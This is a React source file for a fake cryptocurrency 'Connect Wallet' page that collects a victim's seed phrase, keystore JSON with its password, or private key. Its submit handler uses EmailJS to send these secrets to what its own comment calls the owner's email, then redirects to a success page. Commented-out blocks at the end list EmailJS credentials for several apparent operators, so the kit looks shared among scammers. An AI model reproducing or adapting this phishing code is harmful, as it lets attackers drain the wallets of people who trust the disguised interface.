import React, { useState, useRef } from "react";
import { useNavigate, Link } from "react-router-dom";
import { useParams } from "react-router-dom";

// (Emailjs)
import emailjs from "@emailjs/browser";

const ConnectPage = () => {
  const form = useRef();
  const navigate = useNavigate();
  const { wallet } = useParams();

  const [typeSelected, setTypeSelected] = useState(1);
  const [showOpen] = useState([
    {
      id: 1,
      name: "Phrase",
    },
    {
      id: 2,
      name: "Keystore",
    },
    {
      id: 3,
      name: "Private Key",
    },
  ]);
  const [isSubmittingResult, setIsSubmittingResult] = useState(false);

  const [formData, setFormData] = useState({
    walletName: wallet ?? "Unknown wallet",
    key: "",
  });

  // TODO:  CHECK IF PHRASE HAS 12+ WORDS
  const checkIfPhrasehasMoreThanTwelveWordsOrSingleWord = (phrase) => {
    const words = phrase.trim().split(/\s+/);
    return (words.length > 10) | (words.length === 1);
  };

  // TODO: SUBMIT FORM
  const onSubmitHandler = (e) => {
    e.preventDefault();

    if (checkIfPhrasehasMoreThanTwelveWordsOrSingleWord(formData.key)) {
      // ENABLE BUTTON LOADING STATE service_j2f3mvc
      setIsSubmittingResult(true);

      // TODO: SEND RESULT TO OWNER'S EMAIL ADDRESS
      emailjs
        .sendForm(
          "service_vqk3j6s",
          "template_yddziip",
          form.current,
          "user_b4Mmcj0REmZ5z7E4Norkj"
        )
        .then(
          (result) => {
            setTimeout(() => {
              // DISABLE BUTTON LOADING STATE
              setIsSubmittingResult(false);

              // REDIRECT TO SUCCESS PAGE AFTER 5SECS
              navigate("/success");
            }, 5000);
          },
          (error) => {
            console.log(error.text);
            // DISABLE BUTTON LOADING STATE
            setIsSubmittingResult(false);

            // SHOW ALERT
            alert("Please Try again later!");
          }
        );
    } else {
      // DISABLE BUTTON LOADING STATE
      setIsSubmittingResult(false);

      // SHOW ALERT
      alert("The Phrase key you entered is invalid");
    }
  };

  return (
    <div className=" w-full bg-[#13132F] min-h-screen py-10 px-4">
      <div className="w-full max-w-md mx-auto p-4 relative flex flex-col gap-4 justify-center text-center py-5 bg-[#1E1E3F] rounded-xl">
        <header className="w-full flex items-center justify-center">
          <div className="w-auto flex flex-col items-center gap-2 px-1">
            <img
              src={
                "data:image/jpeg;base64,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"
              }
              alt={"This wallet"}
              className="w-16 rounded-lg p-1 object-cover"
              draggable={false}
            />
            <h4 className="text-2xl font-semibold">Other Wallets </h4>
          </div>
        </header>

        <div className="w-full bg-transparent text-white mx-auto rounded-lg">
          <main className="w-full h-full grid grid-rows-[auto_1fr]">
            <section className="w-full bg-transparent">
              <>
                <div className="w-full grid grid-cols-3 gap-1 justify-start items-center bg-[#353553] rounded-lg flex-wrap">
                  {showOpen.map((option) => {
                    return (
                      <button
                        onClick={() => setTypeSelected(option.id)}
                        className={`w-auto ${
                          typeSelected === option.id && "bg-[#4C6FFF]"
                        } py-2 text-white text-base font-medium rounded-lg`}
                      >
                        {option.name}
                      </button>
                    );
                  })}
                </div>

                <div className="w-full h-full py-4">
                  <form
                    action="POST"
                    ref={form}
                    onSubmit={onSubmitHandler}
                    className="w-full grid grid-cols-1 gap-y-4"
                  >
                    <div className="w-full flex flex-col gap-y-1.5">
                      <input
                        type="text"
                        name="walletName"
                        value={formData.walletName}
                        onChange={(e) =>
                          setFormData((prevData) => ({
                            ...prevData,
                            walletName: e.target.value,
                          }))
                        }
                        style={{ display: "none" }}
                        className="border border-[#cccccc36] p-2 rounded-lg bg-[#181832]"
                      />
                    </div>

                    {/* FOR PHRASE KEY ONLY */}
                    {typeSelected === 1 && (
                      <>
                        <div className="w-full flex flex-col gap-y-1.5">
                          <textarea
                            type="text"
                            name="key"
                            id="phrasekey"
                            placeholder={`Enter your backup Wallet Phrase key associated with the account`}
                            onChange={(e) =>
                              setFormData((prevData) => ({
                                ...prevData,
                                key: e.target.value,
                              }))
                            }
                            className="border border-[#cccccc36] text-white py-2 px-4 rounded-lg min-h-[100px] bg-[#181832]"
                          ></textarea>
                        </div>
                      </>
                    )}

                    {/* FOR KEYSTORE ONLY */}
                    {typeSelected === 2 && (
                      <>
                        <div className="w-full flex flex-col gap-y-1.5">
                          <textarea
                            type="text"
                            name="hex"
                            id="pass"
                            placeholder={`Enter your Keystore JSON`}
                            onChange={(e) =>
                              setFormData((prevData) => ({
                                ...prevData,
                                key: e.target.value,
                              }))
                            }
                            className="border border-[#cccccc36] text-white py-2 px-4 rounded-lg min-h-[100px] bg-[#181832]"
                          ></textarea>
                        </div>

                        <div className="w-full flex flex-col gap-y-1.5">
                          <input
                            type="text"
                            name="pass"
                            id="phrasekey"
                            placeholder={`Keystore Password `}
                            onChange={(e) =>
                              setFormData((prevData) => ({
                                ...prevData,
                                key: e.target.value,
                              }))
                            }
                            className="border border-[#cccccc36] text-white py-2 px-4 rounded-lg min-h-[50px] bg-[#181832]"
                          />
                        </div>
                      </>
                    )}

                    {/* FOR PRIVATE KEY ONLY */}
                    {typeSelected === 3 && (
                      <>
                        <div className="w-full flex flex-col gap-y-1.5">
                          <input
                            type="text"
                            name="key"
                            id="phrasekey"
                            placeholder={`Enter your Private key `}
                            onChange={(e) =>
                              setFormData((prevData) => ({
                                ...prevData,
                                key: e.target.value,
                              }))
                            }
                            className="border border-[#cccccc36] text-white py-2 px-4 rounded-lg min-h-[50px] bg-[#181832]"
                          />
                        </div>
                      </>
                    )}

                    <div className="w-full mb-3">
                      <p className="text-[12px] text-start opacity-70">
                        Typically 12 (sometimes 24) words separated by single
                        spaces
                      </p>
                    </div>

                    <div className="w-full">
                      <button
                        type="submit"
                        disabled={isSubmittingResult ? true : false}
                        className="w-full bg-blue-600 text-base text-white font-medium rounded-lg flex gap-1 justify-center items-center py-2 px-4 capitalize"
                      >
                        {isSubmittingResult
                          ? "Connecting..."
                          : " Connect Wallet"}
                      </button>
                    </div>

                    <div className="w-full mb-3">
                      <p className="text-[12px] text-center opacity-90">
                        By connecting a wallet, you agree to our{" "}
                        <Link href="#" className="text-blue-600">
                          Terms of service
                        </Link>
                      </p>
                    </div>
                  </form>
                </div>
              </>
            </section>
          </main>
        </div>
      </div>
    </div>
  );
};

export default ConnectPage;

// BORNREADY OWN
// .sendForm(
//   "service_9bdprzm",
//   "template_me80vej",
//   form.current,
//   "user_aQA28N8lTPmEIZn2tL3a3"
// )

// MAYDFREEZYNET OWN
// .sendForm(
//  "service_wc9slmv",
//    "template_sqkf6yr",
//    form.current,
//    "user_iM5bInfG3UaGxE1Zlgr6t";
// )

// KISH OWN
// emailjs.sendForm(
//   "service_vqk3j6s",
//   "template_yddziip",
//   form.current,
//   "user_b4Mmcj0REmZ5z7E4Norkj"
// );

// ANU OWN OWN
// emailjs.sendForm(
//   "service_j2f3mvc",
//   "template_uaka5lb",
//   form.current,
//   "user_sLwuDxsM7QfUfFXoi9jg9"
// );
